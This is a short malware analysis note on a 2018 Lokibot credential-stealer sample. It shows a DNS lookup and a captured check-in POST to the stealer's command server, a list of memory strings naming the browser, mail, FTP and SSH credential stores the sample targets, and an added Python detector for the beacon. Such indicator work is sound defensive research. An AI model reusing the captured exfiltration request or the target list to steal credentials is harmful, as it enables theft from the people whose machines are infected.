Neonprimetime

2018-04-12 lokibot sample

Apr 12th, 2018
just found on recent submissions on hybrid analysis
https://www.reverse.it/sample/c2678090c55db4f1b39e4d8987b6f3ca6651615fcaae46452f08cad1e8fc6291?environmentId=100
#lokibot

------------

closes itself and re-opens another executable with the same name

------------
interesting packet captures
------------
1.) Domain Name System (response)
Queries
kox.termofoc.gr: type A, class IN
Answers
Address: 198.12.153.138

2.) POST /oki/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: kox.termofoc.gr
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E5CE4ED4
Content-Length: 227
Connection: close

..'.......ckav.ru.....[REDACTED USER ID] .......[REDACTED PC NAME].......[REDACTED PC NAME].....................k...........:.....0...2.7.1.8.4.5.3.1.A.2.C.7.0.B.8.D.E.A.0.4.0.E.E.7.....vQURz).....H......ht.ps8:/.w..rerv....it.log.n..`.

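Detection logic for the check-in above, added here as an example (it is not the paste author's tooling). It parses a raw HTTP request as seen on the wire and matches it against the indicators visible in the capture: the "Mozilla/4.08 (Charon; Inferno)" User-Agent, the non-standard Content-Key header, a binary octet-stream POST over HTTP/1.0, the fre.php path, and the host and resolved IP. The two sample requests are constructed for the demo; the benign one is made up and the Lokibot one reproduces the captured headers with the body omitted.

```python
"""Flag HTTP requests that look like the Lokibot check-in in this paste.

Added example, not the original author's code. Indicator values are taken
from the capture above; sample requests are constructed for the demo.
"""
from __future__ import annotations

# Indicators taken from the capture in this paste.
KNOWN_C2_HOSTS = {"kox.termofoc.gr"}
KNOWN_C2_IPS = {"198.12.153.138"}
LOKI_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, version and a header dict.

    Header names are lower-cased so lookups are case-insensitive; the body
    (everything after the first blank line) is ignored.
    """
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [ln for ln in head.split("\n") if ln.strip()]
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def score_lokibot_beacon(raw: str, dst_ip: str | None = None) -> list[str]:
    """Return the list of Lokibot-style indicators matched by one request."""
    req = parse_http_request(raw)
    h = req["headers"]
    hits = []
    if h.get("user-agent") == LOKI_USER_AGENT:
        hits.append("user-agent Charon/Inferno")
    if "content-key" in h:
        hits.append("Content-Key header present")
    if (req["method"] == "POST"
            and req["version"] == "HTTP/1.0"
            and h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding") == "binary"):
        hits.append("binary octet-stream POST over HTTP/1.0")
    if req["path"].endswith("/fre.php"):
        hits.append("path ends in fre.php")
    if h.get("host") in KNOWN_C2_HOSTS:
        hits.append("known C2 host")
    if dst_ip in KNOWN_C2_IPS:
        hits.append("known C2 IP")
    return hits


def is_lokibot_beacon(raw: str, dst_ip: str | None = None, threshold: int = 2) -> bool:
    """Alert on the distinctive User-Agent alone, or on `threshold` weaker indicators.

    The structural indicators (octet-stream POST, fre.php path) can occur in
    legitimate traffic, so they only alert in combination.
    """
    hits = score_lokibot_beacon(raw, dst_ip)
    return "user-agent Charon/Inferno" in hits or len(hits) >= threshold


# Constructed sample: the headers from the capture above, body omitted.
SAMPLE_LOKI = (
    "POST /oki/fre.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: kox.termofoc.gr\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: E5CE4ED4\r\n"
    "Content-Length: 227\r\n"
    "Connection: close\r\n\r\n"
)

# Constructed benign upload for comparison (hypothetical host).
SAMPLE_BENIGN = (
    "POST /api/upload HTTP/1.1\r\n"
    "Host: files.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: 10\r\n\r\n"
)

if __name__ == "__main__":
    for label, raw, ip in (("loki", SAMPLE_LOKI, "198.12.153.138"),
                           ("benign", SAMPLE_BENIGN, None)):
        print(label, is_lokibot_beacon(raw, ip), score_lokibot_beacon(raw, ip))
```

The User-Agent is the strongest single signal here because the memory string at 0x247168 shows it is filled in from a format string by the sample itself rather than borrowed from a real browser; the Content-Key header and the HTTP/1.0 octet-stream POST are useful corroboration when the host changes between campaigns.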
------------
interesting strings found in memory
------------
0x247168 (115): HTTP/1.0
User-Agent: %s
Host: %s
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
0x247fb0 (231): i/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: kox.termofoc.gr
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
0x415524 (26): Comodo\Dragon
0x415540 (44): MapleStudio\ChromePlus
0x415570 (26): Google\Chrome
0x4155d4 (26): Titan Browser
0x4155fc (40): Yandex\YandexBrowser
0x415628 (40): Epic Privacy Browser
0x415654 (28): CocCoc\Browser
0x415684 (30): Comodo\Chromodo
0x4156b8 (26): Coowon\Coowon
0x4156d4 (30): Mustang Browser
0x4156f4 (36): 360Browser\Browser
0x41571c (40): CatalinaGroup\Citrio
0x415748 (34): Google\Chrome SxS
0x41578c (44): \Opera\Opera Next\data
0x4157bc (56): \Opera Software\Opera Stable
0x4157f8 (102): \Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer
0x415860 (104): \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
0x415ba0 (62): %s\Mozilla\Firefox\profiles.ini
0x415be0 (60): %s\Mozilla\Firefox\Profiles\%s
0x415c20 (66): %s\Mozilla\SeaMonkey\profiles.ini
0x415c68 (64): %s\Mozilla\SeaMonkey\Profiles\%s
0x415cac (58): %s\Flock\Browser\profiles.ini
0x415ce8 (56): %s\Flock\Browser\Profiles\%s
0x415d24 (54): %s\Thunderbird\profiles.ini
0x415d5c (52): %s\Thunderbird\Profiles\%s
0x415d94 (48): %s\K-Meleon\profiles.ini
0x415dc8 (28): %s\K-Meleon\%s
0x415de8 (64): %s\Comodo\IceDragon\profiles.ini
0x415e30 (62): %s\Comodo\IceDragon\Profiles\%s
0x415e70 (92): %s\NETGATE Technologies\BlackHawk\profiles.ini
0x415ed0 (90): %s\NETGATE Technologies\BlackHawk\Profiles\%s
0x415f2c (46): %s\Postbox\profiles.ini
0x415f5c (44): %s\Postbox\Profiles\%s
0x415f90 (74): %s\8pecxstudios\Cyberfox\profiles.ini
0x415fe0 (72): %s\8pecxstudios\Cyberfox\Profiles\%s
0x416030 (94): %s\Moonchild Productions\Pale Moon\profiles.ini
0x416090 (92): %s\Moonchild Productions\Pale Moon\Profiles\%s
0x4160f0 (50): %s\FossaMail\profiles.ini
0x416124 (48): %s\FossaMail\Profiles\%s
0x416158 (150): %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data
0x417120 (28): IMAP Password2
0x417140 (28): NNTP Password2
0x417160 (36): HTTPMail Password2
0x417188 (28): SMTP Password2
0x4171a8 (26): POP3 Password
0x4173d0 (30): %s\32BitFtp.TMP
0x4173f0 (30): %s\32BitFtp.ini
0x417410 (54): %s\Estsoft\ALFTP\ESTdb2.dat
0x417448 (22): %s\site.xml
0x417460 (46): %s\BitKinex\bitkinex.ds
0x4174ac (30): LastUsedProfile
0x4174cc (56): Software\Bitvise\BvSshClient
0x417508 (40): %s\BlazeFtp\site.dat
0x417538 (72): Software\FlashPeak\BlazeFtp\Settings
0x417584 (24): LastPassword
0x4175b4 (22): LastAddress
0x417618 (88): Software\NCH Software\ClassicFTP\FTPAccounts
0x417694 (24): %s\Cyberduck
0x4176b0 (22): user.config
0x4176c8 (30): %s\iterate_GmbH
0x4176e8 (30): %s\EasyFTP\data
0x4181b8 (64): Software\9bis.com\KiTTY\Sessions
0x418200 (70): Software\SimonTatham\PuTTY\Sessions
0x418438 (22): %s\SmartFTP
0x418460 (44): %s\Staff-FTP\sites.ini
0x418490 (44): %s\Steed\bookmarks.txt
0x4184c0 (26): %s\SuperPutty
0x4189b0 (164):

aPLib v1.01 - the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.

More information: http://www.ibsensoftware.com/
0x4a0074 (35): https://kox.termofoc.gr/oki/fre.php